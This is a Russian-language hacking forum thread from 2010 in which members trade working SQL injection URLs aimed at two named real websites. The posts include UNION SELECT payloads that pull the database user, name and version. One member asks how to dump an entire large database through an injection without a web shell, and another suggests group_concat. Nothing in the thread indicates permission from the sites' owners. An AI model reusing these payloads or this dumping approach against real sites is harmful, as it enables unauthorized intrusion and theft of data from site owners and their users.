 |
|
16.03.2010, 19:02
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от Seravin
1) это дело привычки
2)
Код:
http://kip.medaar.ru/prod.php?idsub=-1+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1
Код:
http://kip.medaar.ru/prod.php?idsub=105+and+1=2+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1
(долго это искал чтоб показать)
http://kip.medaar.ru/prod.php?idsub=999+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1
На - реагирует 
|
|
|
16.03.2010, 19:04
|
|
Познающий
Регистрация: 10.01.2009
Сообщений: 31
С нами:
9122965
Репутация:
36
|
|
подскажите пожалуйста, как можно снять дамп бд не имея веб шелла т.е. есть скл иньекция, есть вывод всех таблиц и колонок, содержимого... но проблема в том что БД очень большая и незнаю такой тулзы которым можно автоматизировать процесс т.к делать запрос where+table_name и тем более выдерать оттуда данные не очень удобно.((
СИПТ либо настроил неправильно, либо руки растут оттуда откуда сижу, скорее второе (
|
|
|
|
16.03.2010, 19:07
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от -=ASSKAKO=-
подскажите пожалуйста, как можно снять дамп бд не имея веб шелла т.е. есть скл иньекция, есть вывод всех таблиц и колонок, содержимого... но проблема в том что БД очень большая и незнаю такой тулзы которым можно автоматизировать процесс т.к делать запрос where+table_name и тем более выдерать оттуда данные не очень удобно.((
СИПТ либо настроил неправильно, либо руки растут оттуда откуда сижу, скорее второе (
не очень удобно это как??
|
|
|
|
16.03.2010, 19:12
|
|
Познающий
Регистрация: 10.01.2009
Сообщений: 31
С нами:
9122965
Репутация:
36
|
|
таблиц и данных в БД много, вбивать вручную имя каждой таблицы, колонки и выдирать оттуда данные = пальцы устали(
|
|
|
|
16.03.2010, 19:14
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от -=ASSKAKO=-
таблиц и данных в БД много, вбивать вручную имя каждой таблицы, колонки и выдирать оттуда данные = пальцы устали(
А group_concat использовать пробовал?
|
|
|
|
16.03.2010, 19:16
|
|
Познающий
Регистрация: 10.01.2009
Сообщений: 31
С нами:
9122965
Репутация:
36
|
|
нет,если б знал как правильно составить запрос((
СИПТ либо настроил неправильно, либо руки растут оттуда откуда сижу, скорее второе (
точно второе...
пошел РТФМ |
|
|
|
16.03.2010, 19:18
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
http://www.ecominfo.spb.ru/about/print.php?id=1211+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+--+
Скажите, а это уже слепая?
|
|
|
|
16.03.2010, 19:22
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от CyberHunter
Скажите, а это уже слепая?
http://www.ecominfo.spb.ru/about/print.php?id=-1211+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),database(),version()),15,16,17 ,18,19,20,21,22,23,24,25,26+--+
:'(
|
|
|
|
16.03.2010, 19:22
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами:
9837719
Репутация:
466
|
|
Код:
http://www.ecominfo.spb.ru/about/print.php?id=-1211+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+%20--+
а чо бы ей быть слепой?вывод есть! |
|
|
|
16.03.2010, 19:24
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от CyberHunter
Скажите, а это уже слепая?
Слепота в каком месте???
Код:
http://www.ecominfo.spb.ru/about/print.php?id=1211+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26+--+
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
